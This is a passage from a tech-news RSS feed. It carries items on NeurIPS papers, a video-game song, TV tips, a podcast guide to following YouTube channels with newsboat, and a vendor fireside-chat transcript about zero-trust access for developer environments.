href="https://openreview.net/pdf?id=6p3AuaHAFiN">Large Language Models are Zero-Shot Reasoners</a><br>     Takeshi Kojima, <i><b>Shixiang Shane Gu</b></i>,<i><b> </b></i>Machel Reid, Yutaka Matsuo, Yusuke Iwasawa </p><p>     <a href="https://openreview.net/pdf?id=KSKyVYcgp1u">Improved Coresets for Euclidean k-Means</a><br><i><b>Vincent Cohen-Addad</b></i>, Kasper Green Larsen, David Saulpic, Chris Schwiegelshohn, Omar Ali Sheikh-Omar </p><p>     <a href="https://openreview.net/pdf?id=Fd05J4Bu5Sp">On the Adversarial Robustness of Mixture of Experts</a><br><i><b>Joan Puigcerver</b></i>,<i><b> Rodolphe Jenatton</b></i>,<i><b> Carlos Riquelme Ruiz</b></i>,<i><b> Pranjal Awasthi</b></i>,<i><b> Srinadh Bhojanapalli</b></i></p><p>     <a href="https://openreview.net/pdf?id=q5h7Ywx-sS">Stars: Tera-Scale Graph Building for Clustering and Learning</a><br><i><b>CJ Carey</b></i>, <i><b>Jonathan Halcrow</b></i>,<i><b> Rajesh Jayaram</b></i>, <i><b>Vahab Mirrokni</b></i>, <i><b>Warren Schudy</b></i>, <i><b>Peilin Zhong</b></i></p><p>     <a href="https://openreview.net/pdf?id=VrJWseIN98">VER: Scaling On-Policy RL Leads to the Emergence of Navigation in Embodied Rearrangement</a><br>     Erik Wijmans, <i><b>Irfan Essa</b></i>, Dhruv Batra </p><p>     <a href="https://openreview.net/pdf?id=jqzoJw7xamd">TaSIL: Taylor Series Imitation Learning</a><br>     Daniel Pfrommer, Thomas TCK Zhang, <i><b>Stephen Tu</b></i>, Nikolai Matni </p><p>     <a href="https://openreview.net/pdf?id=2dgB38geVEU">RNNs of RNNs: Recursive Construction of Stable Assemblies of Recurrent Neural Networks</a><br>     Leo Kozachkov, Michaela M Ennis, <i><b>Jean-Jacques Slotine</b></i></p><p>     <a href="https://openreview.net/pdf?id=H547BtAyOJ4">Integral Probability Metrics PAC-Bayes Bounds</a><br>     Ron Amit, Baruch Epstein, <i><b>Shay Moran</b></i>, Ron Meir </p><p>     <a href="https://openreview.net/pdf?id=rG7HZZtIc-">D2NeRF: Self-Supervised Decoupling of Dynamic and Static Objects from a Monocular Video</a><br>     Tianhao Wu, Fangcheng Zhong, <i><b>Andrea Tagliasacchi</b></i>,<i><b> Forrester Cole</b></i>,<i><b> Cengiz Oztireli</b></i></p><p>     <a href="https://openreview.net/pdf?id=UqA1mcOxiq">Posted Pricing and Dynamic Prior-Independent Mechanisms with Value Maximizers</a><br><i><b>Yuan Deng</b></i>, <i><b>Vahab Mirrokni</b></i>,<i><b> </b></i>Hanrui Zhang </p><p>     <a href="https://openreview.net/pdf?id=Vu-B0clPfq">Transformer Memory as a Differentiable Search Index</a><br><i><b>Yi Tay</b></i>,<i><b> Vinh Q. Tran</b></i>,<i><b> Mostafa Dehghani</b></i>,<i><b> Jianmo Ni</b></i>,<i><b> Dara Bahri</b></i>,<i><b> Harsh Mehta</b></i>,<i><b> Zhen Qin</b></i>,<i><b> Kai Hui</b></i>, <i><b>Zhe Zhao</b></i>,<i><b> Jai Gupta</b></i>,<i><b> Tal Schuster</b></i>,<i><b> William W. Cohen</b></i>,<i><b> Donald Metzler</b></i>  <!--Footnotes themselves at the bottom.--></p><hr width="80%"><span class="Apple-style-span"><br><a name="1"><sup>*</sup></a>Work done while at Google.<a href="http://ai.googleblog.com/#top1">  <sup>↩</sup></a></span><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kings Elliot liefert Song zu Horror-Video-Game]]></title>
<description><![CDATA[«The Callisto Protocol» heisst das Videogame, das ab 2. Dezember Horror im Weltall auf den Bildschirm bringt. Der Trailer dazu zeigt blutige Kämpfe. Während in vielen Games der Soundtrack laut und heftig ist, ist der Trailer mit einem ganz ruhigen Song ...]]></description>
<link>https://tsecurity.de/de/1703306/it-nachrichten/kings-elliot-liefert-song-zu-horror-video-game/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1703306/it-nachrichten/kings-elliot-liefert-song-zu-horror-video-game/</guid>
<pubDate>Tue, 22 Nov 2022 13:04:14 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[«The Callisto Protocol» heisst das Videogame, das ab 2. Dezember Horror im Weltall auf den Bildschirm bringt. Der Trailer dazu zeigt blutige Kämpfe. Während in vielen Games der Soundtrack laut und heftig ist, ist der Trailer mit einem ganz ruhigen Song ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Wetten, dass..?, Network, Das Wunder, Billy Elliot: TV-Tipps für Samstag]]></title>
<description><![CDATA[Die abenteuerliche Weltreise des Magellan, Good Fellas – Drei Jahrzehnte in der Mafia, Mike – Mit Radiotipps

					
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://i.ds.at/ZxyMDA/rs:fill:150:0/plain/2022/11/18/wunder1.jpg');
									});]]></description>
<link>https://tsecurity.de/de/1700491/it-nachrichten/wetten-dass-network-das-wunder-billy-elliot-tv-tipps-fuer-samstag/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1700491/it-nachrichten/wetten-dass-network-das-wunder-billy-elliot-tv-tipps-fuer-samstag/</guid>
<pubDate>Sat, 19 Nov 2022 06:47:13 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://i.ds.at/ZxyMDA/rs:fill:150:0/plain/2022/11/18/wunder1.jpg">Die abenteuerliche Weltreise des Magellan, Good Fellas – Drei Jahrzehnte in der Mafia, Mike – Mit Radiotipps<div id="ytplayer_https://i.ds.at/ZxyMDA/rs:fill:150:0/plain/2022/11/18/wunder1.jpg"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://i.ds.at/ZxyMDA/rs:fill:150:0/plain/2022/11/18/wunder1.jpg');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR3695: How I watch youtube with newsboat]]></title>
<description><![CDATA[How I watch youtube with newsboat
I find that the youtube web ui is designed to keep users on the site by feeding them an unending stream of information. Bright colors, distracting thumbnails, peanut galleries, etc. I prefer to consume my videos in the same way I consume everything else: via RSS....]]></description>
<link>https://tsecurity.de/de/1647143/podcasts/hpr3695-how-i-watch-youtube-with-newsboat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1647143/podcasts/hpr3695-how-i-watch-youtube-with-newsboat/</guid>
<pubDate>Fri, 30 Sep 2022 02:46:41 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>How I watch youtube with <code>newsboat</code></h1>
<p>I find that the youtube web ui is designed to keep users on the site by feeding them an unending stream of information. Bright colors, distracting thumbnails, peanut galleries, etc. I prefer to consume my videos in the same way I consume everything else: via RSS.</p>
<p>RSS is my favorite way of aggregating things that other people have made because it allows me, the user, to interact with their things</p>
<p>The only dependencies not on a standard UNIX system are <code>newsboat</code> and a video player. I also use <code>yt-dlp</code> to download videos for later viewing. I like <code>mpv</code> but you can substitute your own.</p>
<pre><code>$ sudo $pkgmrg install newsboat mpv yt-dlp</code></pre>
<h1>Getting RSS feeds from youtube</h1>
<p>Youtube (currently) provides RSS feeds for channels.</p>
<h2>Finding Youtube channel ID</h2>
<p>Sometimes channels have vanity URLs that can make it difficult to find the channel ID. Other times, the URL contains the channel ID. All youtube channel IDs start with the string <code>UC</code> so we can easily grep for them.</p>
<pre><code>$ curl https://www.youtube.com/c/RMCRetro | grep --color "href=\"https://www.youtube.com/channel/UC"`
[ lots of nonsense ]
href="https://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w"
[ lots of nonsense ]</code></pre>
<p>In order to turn this channel ID into something useful, we create the following URL:</p>
<pre><code>https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w</code></pre>
<p><a href="https://takeout.google.com/">Google takeout can also be used to export youtube subscriptions.</a></p>
<p>The export format is a CSV that contains the channel IDs for all of our subscriptions.</p>
<pre><code>Channel Id,Channel Url,Channel Title
UCLEoyoOKZK0idGqSc6Pi23w,http://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w,RMC - The Cave</code></pre>
<h1>Newsboat url list</h1>
<p>Newsboat reads it’s list of URLs from <code>~/.config/newsboat/urls</code>. Every url we add to this list will be automaticlly fetched. You can make separate URL lists for your list of videos and list of standard text based RSS feeds</p>
<p>If you have an exported CSV, you can easily modify it so that newsboat will accept it as a list of URLs by deleting row 1, column 1+comma, and replacing the comma between the URL and channel name with a tab character. Doing a <code>sed 's/channel\//feeds\/videos.xml?channel_id=/g'</code> on the file is an easy way to replace the website URL with the feed url. Newsboat only reads the first field of every row so the channel name can be kept for easier subscription management.</p>
<pre><code>http://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w     RMC - The Cave</code></pre>
<h1>Newsboat config</h1>
<p>In order to play videos, we need to add some macros to the newsboat config file at <code>~/.config/newsboat/config</code></p>
<p>Mine looks like this.</p>
<pre><code># load URLS on launch
auto-reload  yes

# vim binds
bind-key j down
bind-key k up
bind-key j next articlelist
bind-key k prev articlelist
bind-key J next-feed articlelist
bind-key K prev-feed articlelist
bind-key G end
bind-key g home
bind-key d pagedown
bind-key u pageup
bind-key l open
bind-key h quit
bind-key a toggle-article-read
bind-key n next-unread
bind-key N prev-unread
bind-key D pb-download
bind-key U bashow-urls
bind-key x pb-delete

# macro setup
browser linkhandler
macro , open-in-browser

# launch video player
macro v set browser "setsid -f mpv" ; open-in-browser ; set browser linkhandler

# download vidoe
macro d set browser "yt-dlp"; open-in-browser ; set browser linkhandler

# download audio only
macro a set browser "yt-dlp --embed-medatada -xic -f bestaudio/best" ; open-in-browser ; set browser linkhandler</code></pre>
<h1>Video demo</h1>
<p>This is a demo of using newsboat with videos. In order to execute the macros, you type <code>,</code> then <code>v</code> or whatever other letter you set the macro to.</p>
<p><a href="https://hackerpublicradio.org/eps/hpr3695/newsboat.webm">video in webm format</a> your web browser or operating system does not support free video codecs :(</p>
<h1>A url list to get you started</h1>
<pre><code>https://www.youtube.com/feeds/videos.xml?channel_id=UC3ts8coMP645hZw9JSD3pqQ        Andreas Kling
https://www.youtube.com/feeds/videos.xml?channel_id=UC9-y-6csu5WGm29I7JiwpnA        Computerphile
https://www.youtube.com/feeds/videos.xml?channel_id=UC15BJjhPr4d5gTClhmC4HRw        Elliot Coll
https://www.youtube.com/feeds/videos.xml?channel_id=UCxQKHvKbmSzGMvUrVtJYnUA        Learn Linux TV
https://www.youtube.com/feeds/videos.xml?channel_id=UCm9K6rby98W8JigLoZOh6FQ        LockPickingLawyer
https://www.youtube.com/feeds/videos.xml?channel_id=UCl2mFZoRqjw_ELax4Yisf6w        Louis Rossmann
https://www.youtube.com/feeds/videos.xml?channel_id=UC2eYFnH61tmytImy1mTYvhA        Luke Smith
https://www.youtube.com/feeds/videos.xml?channel_id=UC7YOGHUfC1Tb6E4pudI9STA        Mental Outlaw
https://www.youtube.com/feeds/videos.xml?channel_id=UCjFaPUcJU1vwk193mnW_w1w        Modern Vintage Gamer
https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w        RMC - The Cave
https://www.youtube.com/feeds/videos.xml?channel_id=UC4rqhyiTs7XyuODcECvuiiQ        Scott The Woz
https://www.youtube.com/feeds/videos.xml?channel_id=UC5I2hjZYiW9gZPVkvzM8_Cw        Techmoan
https://www.youtube.com/feeds/videos.xml?channel_id=UCy0tKL1T7wFoYcxCe0xjN6Q        Technology Connections
https://www.youtube.com/feeds/videos.xml?channel_id=UC8uT9cgJorJPWu7ITLGo9Ww        The 8-Bit Guy
https://www.youtube.com/feeds/videos.xml?channel_id=UC5UAwBUum7CPN5buc-_N1Fw        The Linux Experiment
https://www.youtube.com/feeds/videos.xml?channel_id=UCFMx-JitepTttWc-ABHhu8A        This Week in Retro
https://www.youtube.com/feeds/videos.xml?channel_id=UCsnGwSIHyoYN0kiINAGUKxg        Wolfgang's Channel
https://www.youtube.com/feeds/videos.xml?channel_id=UCJ8V9aiz50m6NVn0ix5v8RQ        decino                </code></pre>]]></content:encoded>
</item>
<item>
<title><![CDATA[Concept artist reimagines Xbox 360 Blades dashboard for Xbox Series X|S]]></title>
<description><![CDATA[Concept artist Elliot Parker has created a theoretical rendition of the iconic Xbox 360 "Blades" built for Xbox Series X|S hardware.]]></description>
<link>https://tsecurity.de/de/1626338/windows-tipps/concept-artist-reimagines-xbox-360-blades-dashboard-for-xbox-series-xs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1626338/windows-tipps/concept-artist-reimagines-xbox-360-blades-dashboard-for-xbox-series-xs/</guid>
<pubDate>Fri, 09 Sep 2022 19:30:33 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Concept artist Elliot Parker has created a theoretical rendition of the iconic Xbox 360 "Blades" built for Xbox Series X|S hardware.]]></content:encoded>
</item>
<item>
<title><![CDATA[John Ferraro joins Keyavi Data as VP of Sales]]></title>
<description><![CDATA[Keyavi Data announced that John Ferraro has joined the company as vice president of sales. At Keyavi, Ferraro will lead and manage the sales team as well as develop and execute new sales approaches to build pipeline and drive top-line revenue. “John is a dynamic sales executive propelling revenue...]]></description>
<link>https://tsecurity.de/de/1555094/it-security-nachrichten/john-ferraro-joins-keyavi-data-as-vp-of-sales/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1555094/it-security-nachrichten/john-ferraro-joins-keyavi-data-as-vp-of-sales/</guid>
<pubDate>Tue, 28 Jun 2022 22:33:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Keyavi Data announced that John Ferraro has joined the company as vice president of sales. At Keyavi, Ferraro will lead and manage the sales team as well as develop and execute new sales approaches to build pipeline and drive top-line revenue. “John is a dynamic sales executive propelling revenue growth at multiple IT enterprises and successfully scaling startups in the infrastructure and security sectors,” said Elliot Lewis, CEO. “His 25 years of experience driving deals … <a href="https://www.helpnetsecurity.com/2022/06/29/keyavi-data-john-ferraro/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a rel="nofollow" href="https://www.helpnetsecurity.com/2022/06/29/keyavi-data-john-ferraro/">John Ferraro joins Keyavi Data as VP of Sales</a> appeared first on <a rel="nofollow" href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pill Club Fireside Chat Recap]]></title>
<description><![CDATA[Securing Developer Environments with Pill Club’s Cameron SeebachWhat do DevOps, contraception availability, and a composer named Ham Sandwich Quantum Party have in common? These are all pieces that make up the unique and wonderful first guest in our DevOps Fireside Chat series, Cameron Seebach. C...]]></description>
<link>https://tsecurity.de/de/1529632/it-security-nachrichten/pill-club-fireside-chat-recap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1529632/it-security-nachrichten/pill-club-fireside-chat-recap/</guid>
<pubDate>Sat, 04 Jun 2022 07:05:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.twingate.com/static/2636f351bcf05ce2a83df831599a55d3/pillclub.png"><br><h1>Securing Developer Environments with Pill Club’s Cameron Seebach</h1><p>What do DevOps, contraception availability, and a composer named Ham Sandwich Quantum Party have in common? These are all pieces that make up the unique and wonderful first guest in our DevOps Fireside Chat series, Cameron Seebach. Cameron is the DevOps Engineer and Tech Lead at <a href="https://thepillclub.com/">The Pill Club</a>, a company whose mission is to make healthcare more accessible by building digital primary care that closes gender, socioeconomic, and racial gaps in our current health system.</p><p>During the chat, Twingate Co-Founder and Chief Product Officer Alex Marshall dug into Cameron’s journey to DevOps, how he is securing developer environments today, and why <a href="https://www.twingate.com/blog/ztna/">Zero Trust</a> is the next step in security maturity.</p><h2>DevOps Fireside Chat: Pill Clubs Cameron Seebach</h2><div class="gatsby-resp-iframe-wrapper">  </div><h2>Fireside Chat Transcript</h2><p><strong>Elliot Volkman:</strong> Hello, good morning and good afternoon. Thank you for joining us for today’s presentation. Today we’re going to be chatting with Cameron over at Pill Club. We’re going to be focusing on two different elements, for the start of this presentation we’re going to be looking at a couple of use cases that Cameron is putting into play over at Pill Club on how he and his team are securing their dev environment. And then we’re going to shift over to a fireside chat, which will be co-hosted by our CPO and co-founder Alex.</p><p>Before we get started, let’s introduce our guest speaker today, Cameron Seebach. He is the senior DevOps engineer and team lead over at Pill Club. As the DevOps engineer, Cameron was the first to identify opportunities for expanded use of cloud computing services across the Pill Club.</p><p><strong>Elliot Volkman:</strong> Cameron has led the implementation of systems that handled millions of SMS messages monthly, and leveraged Elasticsearch to optimize operation workflows, passionate about all things <a href="https://www.twingate.com/blog/aws-client-vpn/">AWS</a>, Cameron builds solutions that meet the scaling and challenges, strict security needs and compliance goals of a hyper growth healthcare business. He composes electronic music under the name of Ham Sandwich Quantum Party, and holds a BA in computer science from Cornell College in Mountford, Iowa.</p><p><strong>Alex Marshall:</strong> If you’re just joining us right now I’m talking to Cameron Seebach who’s a senior DevOps engineer tech lead at Pill Club. I really appreciate you guys over the presentation. I’ve learned some things, but I definitely have some more questions. I’d love to go into that, but just a quick introduction of myself. I’m one of the co-founders at Twingate, currently the chief product officer, and we’ve seen this through from the very beginning.</p><p>One of the things I think we’ve been very passionate about is, if you look at the Zero Trust space, it makes sense as this direction that things have been going in, and makes sense as a model that’s a lot easier for companies to use and adopt.</p><p><strong>Alex Marshall:</strong> We’ve been really passionate about making things easy to adopt. We’ll have some questions about that for you in a second. But just to jump into a little bit more background and depth on some of your experience with the Pill Club. Could you give us a little bit of background? I think there’s some sequencing things here, there’s sort of the background of what you were doing previously to gain secure access into some of your more privileged environments. Then I think that, that’s sort of a parallel effort to some of the changes you were just describing in terms of the dev environments were more stable and easier to get them running.</p><p>Could you talk a little bit more like what that decision making was like, did those two things come together? Was one independent of the other? I’d love to hear a bit more about that then we can dig in.</p><p><strong>Cameron Seebach:</strong> Sure. Specifically this kind of access into a dev environment wasn’t really possible before we adopted Twingate, so there’s that piece right there that we should definitely dig into, but to go back a couple of steps we were using, across the company, a <a href="https://www.twingate.com/blog/zero-trust-vpn/">traditional VPN</a>.</p><p>We tried working with a <a href="https://www.twingate.com/blog/vpn-split-tunneling/">split tunnel</a> setup that many of you are familiar with and that has its own headaches and challenges. The VPN went down all the time because it was trying to serve too much traffic. Whenever we had a user come in that needed to be added to the VPN it was always a hassle that involved sometimes restarting the whole service and taking down access for more folks than we would like.</p><p><strong>Cameron Seebach:</strong> We made the switch to Twingate, I think maybe it’s been a year and a half or something like that ago, and the experience is way different. We were using a really hefty machine to power our VPN solution before, because it was serving everybody’s traffic, now we spend maybe $40 on our machines to serve over 400 users. That kind of came parallel to the stuff that we were doing with these dev environments, where we started solving the access challenges for folks across the company with Twingate, and then we took a look at this engineering environment that we had built and said,</p><p>“Well, this is okay, but how do we enable really good collaboration without having to install a heavyweight VPN solution on every developer’s machine?”</p><p>Because Twingate works essentially on top of existing DNS standards we can just drop the Twingate connectors inside these machines, they’re lightweight, they only take up resources when they’re being used. And it’s been such a huge difference in what we can do.</p><p><strong>Alex Marshall:</strong> When you think about what this Zero Trust approach lets you achieve, how do you think you would’ve actually deployed these dev environments without something like this? Like, what would the approach have been?</p><p><strong>Cameron Seebach:</strong> Gosh, it would’ve been something probably like we would’ve had a Secure Shell forwarding system that was inside every developer environment that would’ve talked to some kind of a central service that we would had to spin up ourselves. There would’ve been that central point of failure for this that I would’ve been really worried about, and there would’ve been a lot of access and administration hurdles that we don’t have today. There would’ve been things like making sure that developer machines had proper SSH keys. There would’ve been things like making sure that we had scoped the security and firewall groups on that central resource properly. And these are challenges that I don’t think I would’ve been willing to take on, it would’ve been a lot of additional work on the DevOps plate.</p><p><strong>Alex Marshall:</strong> Before I go to the next question, on that point, you mentioned earlier that one of the advantages is that you can have things administered centrally. How do you think that shifted the responsibilities between configuring the environments, make sure they’re upper running versus maintaining access, and maybe some things actually don’t work as you’d like right now, but curious how you’d look at that split right now.</p><p><strong>Cameron Seebach:</strong> One of the great things that Twingate enables us to do is, to link in our existing single sign-on provider for managing access. When people enter or exit the company those settings are applied immediately on the day of, whereas if it were up to the DevOps team to administer that access, we have seen unfortunately that sometimes we miss a departure or an entrance of employees, so that’s one part that is made really easy via the deployment of Twingate. Then, to answer the other part of your question, you’re asking specifically about the ways in which the DevOps team has shifted its responsibility sort of?</p><p><strong>Alex Marshall:</strong> Yes, because I guess you’ve answered it a little bit, so it sounds like before you might’ve been responsible for defining, building, defining processes around the environment, and then also managing access. It sounds like where you’ve ended up as this place where you can be more focused on the environment itself and then access becomes a responsibility that you can either share or move on to another team, like what you’re saying with the <a href="https://www.twingate.com/blog/introducing-identity-first-networking/">IDP integration</a>.</p><p><strong>Cameron Seebach:</strong> Yes, that’s exactly right. I don’t spend any time managing, I don’t spend any time pushing people in and out of groups anymore. I spend my time when I’m working on developer productivity concerns like this, I spend my time just on making that experience of installing the software and configuring it easier, which is a huge reduction in the amount of left effort required.</p><p><strong>Alex Marshall:</strong> Great. For anyone listening or watching, I think that’s a really important point actually, that you can split these responsibilities where I think previously you had… I think with past or existing methods, you sort of link your <a href="https://www.twingate.com/blog/network-architecture/">network infrastructure</a> the way you’re configuring your environment to access, now you can actually split those things out. We’ve talked about some of the good things, tell us a little bit about what the process was like in terms of how difficult it was, did you run into limitations or challenges along the way?</p><p><strong>Cameron Seebach:</strong>There were a few challenges. The one that is most prominent in my mind is that we had to come up with an environment that a user in the engineering side could check in and out as needed, and that basically means that over the course of a day an engineering user might check out like let’s say environment dev one or something like that. We had to find a way to say, “Okay, a user could check out one of these environments, but we don’t necessarily know when they’ve stopped using it.” We ended up solving that basically with an API integration with Twingate, where we checked to see if the resource that is attached to that particular developer environment is up and running or not. And if that developer environment is not running, we give it 30 minutes and see, and we check a couple times. If it’s still not running at the end of that time, we check that developer out of that environment and leave it for use by other developers. So, that was one of the challenges that we had.</p><p><strong>Cameron Seebach:</strong> Another challenge was making sure that while we were developing these developer environments, that we were keeping in mind our audience. Because there are many different kinds of developers, even in our team of 40 or 50 engineers. There are some developers who want things to be up and running and don’t really care how it’s done, and then there are developers who want to really get into the details of how that MySQL password is configured, or which database tables are loaded at app startups, stuff like that.</p><p>We’ve done our best to strike a balance between, “Hey, these are reasonable defaults that we think work for this environment.” We run our end-to-end tests on that environment to make sure that it’s running and building okay. But we also offer a lot of knobs and buttons for engineers who want to tweak things to their satisfaction and striking that balance was challenging at first.</p><p><strong>Cameron Seebach:</strong> It was challenging also for engineers to adopt the idea that they were not necessarily in control over every detail of their environment. I think as we’ve gone on through this implementation, they’re starting to discover that it is actually better to have a set of defaults than to configure everything from scratch and just in terms of the time savings. But that has been a shift in the way that our engineers think about their development environments.</p><p><strong>Alex Marshall:</strong> I think, a really closely related area in all this, which is that you can make the technical, the configuration, or the engineering changes, but there’s actually a lot of internal change management and communication that has to happen. How did you guys approach that and did you run into any resistance, and how did you overcome some of those things?</p><p><strong>Cameron Seebach:</strong>We did our rollout in a couple of different ways. We started first with the front end focused engineers, who typically are a lot more interested in just getting something up and running. Once we were able to make some of those engineers into champions for this approach, the rollout across the rest of the team was a lot easier.</p><p>On top of that, we started saying things like, “You don’t have to use this environment, it’s totally optional. I can tell you, it will save you a couple of days every time you need to rebuild something, but don’t need to use it.” And that kind of a non-aggressive approach towards rolling this out really helped us. Because when people feel that they have a choice about whether or not to do something like this and they can evaluate the benefits and risks a lot more easily than if it’s a forced thing.</p><p><strong>Alex Marshall:</strong> That makes a ton of sense. All right, I got one more question here actually from one of the attendees, and then want to move on to a little bit more about your background and what your journey through DevOps has been. The question here from Eran is really around whether you had any security compliance or risk hurdles that you had to overcome now that your remote access solution is tied to a third party, or Twingate versus self-managed VPN infrastructure.</p><p><strong>Cameron Seebach:</strong> That’s a great question, there are a number of ways to think about these kinds of trade offs, and the way that we think about them at the Pill Club is most of the traffic that’s flowing through Twingate is encrypted already because a large portion of it is HDPS traffic. So, that is one thing that we really like. The other thing is, there are always going to be security and compliance trade offs to make when you are considering any kind of a VPN solution. The way we think about them is that I’d much rather have a team like Twingate that is dedicated to making sure that the environment is secure and compliant than trusting my team of three people to do their best, to keep up with security patches, ongoing cyber attacks, and risks like that.</p><p><strong>Cameron Seebach:</strong> We feel that’s a great trade off to make, as we were talking earlier, have a separation of those concerns, have my team be focused on providing a lot of value to the business and also to auditing how we’re doing with the Twingate configuration, but then have the Twingate team be primarily focused on their side of the equation.</p><p><strong>Alex Marshall:</strong> Great. I wanted to switch gears a little bit just for anyone else listening in the DevOps arena or something, or people that are maybe interested in getting into DevOps. Could you talk a little bit more about how you got into the role. I know you talked about this a little bit earlier, but if you talk a little about your journey and maybe along the way, explain what advice you’d have for somebody that’s looking to do the same.</p><p><strong>Cameron Seebach:</strong> Sure. Gosh, where should I start? There’s a lot there. When I was 20, I started out as an IT administrator at a law firm, and I was the most junior of the most junior folks there. I remember doing things like foam cleaning keyboards, and if a printer went offline I’d go over to that person’s computer and reinstall the drivers. And although it looked like magic to the folks that I was helping and it put a smile on their face, it always felt a little bit to me like I could do more.</p><p>I worked there for a couple of years and then decided to go back into school and actually learned some programming, so I got a computer science degree and I loved it. It was amazing. Just the idea that you can type these magic incantations into the computer and something pops up on the screen or sends a request somewhere, that was really cool. I moved to the Bay Area, I started work at a FinTech company as an application developer, it was a Ruby on Rail stack. Ruby, it’s a fantastic language, but it is very slow for those of you who know.</p><p>I worked there for a couple of years and I realized that I was always interested in the infrastructure pieces of something, how the database connections worked, what kind of proxy was in place to send requests from the front end server to the backend server? Things like that. And when I got the opportunity to switch jobs I started thinking more seriously about this, and I raised it with my VP of engineering one day. And I said, “Hey, I have had a lot of experience working with infrastructure at our company. I’d like to eventually become a DevOps engineer.” And I remember that conversation and he basically looked at me for a second and he said, “Okay, let’s start training you on CI processes and get you into our AWS environment so you can start building some features there that we really need.”</p><p>I made the switch from being a pure Ruby on Rails, Java application developer, to building things that were kind of in the middle there. Like, I worked on a lot of continuous integration environments. I worked on a lot of spinning up Docker files for new applications and containers, and that was all really fruitful for me. What I’d recommend to folks who are interested in becoming DevOps engineers, I’d recommend that you get a wide swath of experience.</p><p>You don’t necessarily need to be an expert at everything you do, but you need to have some familiarity with the whole stack. And the easiest way to get that in my opinion is just to ask if you can help out on a project like that. You probably are in an environment where there are existing DevOps engineers that you can work with closely on a project. You may be lucky enough like me to have a VP who can see that you want to do this stuff and is willing to take a risk. And there are so many good ways to get into the field now.</p><p><strong>Alex Marshall:</strong> Absolutely. I think there’s some really great advice embedded in all that, which is that I think a lot of times, especially talking to people earlier in their career, trying to figure out what they should do. I think that the consequences of early career decisions seem much greater than they really are, and I think I’m paraphrasing a little bit. So, the advice would be, just start somewhere where you’re interested, so maybe in your case it’s on the application side, but then continue to explore what else might be interesting until you find something that you’re really passionate about. And then, I think, the big one as well is just other pieces of advice where you just ask. A lot of times it’s just a question of asking for something and often you’ll often get it. I think that’s really great advice. Anything…? Yes, go ahead.</p><p><strong>Cameron Seebach:</strong> I was going to say, especially in the DevOps space where it is so hard to hire DevOps engineers. If I were a VP and I saw that somebody had some infrastructure talent and they asked me if I could have them do an infrastructure project, I would be all over that.</p><p><strong>Alex Marshall:</strong> Yes. From what you’re saying, your story is the story you found out about the role, because you saw that someone else was doing it, that there was a team, but there isn’t obviously a degree in DevOps as far as I know, it’s computer science. How would you suggest that people find out about these things or maybe develop skills and make them good candidates for these different roles?</p><p><strong>Cameron Seebach: </strong>One of the ways that’s really powerful for people that I feel is often overlooked is that pretty much in any domain that you’re interested in, all the way from art history to sports, there is some way that you can build either a computer application or a web application to improve, or further your understanding of some field like that. I had a friend in college who built a baseball game simulator, because it was something he was interested in and he ended up showing that to a potential employer who gave him a job basically because of the cool work that he had done on that project. Personal projects play a huge role in furthering our understanding of what’s involved in building a web application.</p><p><strong>Cameron Seebach:</strong> That’s one thing I would highly recommend is, try building a small application completely from scratch, pick a language that you love, pick a topic that you’re interested in and don’t feel like there’s a pressure to produce anything, the goal is to explore. And if your exploration leads you to someplace interesting, great. If it leads you to someplace where you decide you don’t want to do any more of it, that’s fine too.</p><p><strong>Alex Marshall: </strong>I think that’s wonderful. I think it’s really just being curious. I think the other advice that I think I’ve gotten myself along my career too, is that a lot of times if you want to learn something new or explore, it’s actually good to set yourself a goal. If your goal is, I’m going to produce this app in this particular domain, I just learn a bunch of things to get there and a lot of things that I might not even know about. Maybe just like a few more questions here, then I think we’ll start wrapping up. Moving over to current events, sort of like what’s happening in the world today? What do you feel more broadly on the business side, like some of the biggest threats to this in general at the moment, do you have any high level thoughts on that?</p><p><strong>Cameron Seebach:</strong>High-level thoughts on that, it’s easy, especially for companies that have grown their cloud setups organically, to find that you have a whole bunch of resources that you don’t think are open to the internet, but actually are for one reason or another. And it doesn’t have to be a huge exercise to go and find these, there are great automated tools today that will either scan your existing cloud configuration, if you’re working out of a configuration language like Terraform, you can scan the Terraform directly. And that’s one thing that is very top of mind for me is, whenever we develop a new service application, making sure that it’s behind either a tightly IP whitelisted firewall or that we know it’s going to be public and take appropriate precautions with a web application firewall or some other product that sits in front of it.</p><p><strong>Cameron Seebach:</strong>As with the Log4J disaster that happened last year, it’s not always the big applications or details that make something a problem. It can be something as small as a logging library. Top of mind for me also is keeping dependencies up to date. There are great automated tools that can do this for you today as well. We use AWS inspector for a lot of that and GuardDuty, but there are products from Microsoft and Google that do the same thing.</p><p>Also, top of mind for me is the individual permissions inside your system. Again, a lot 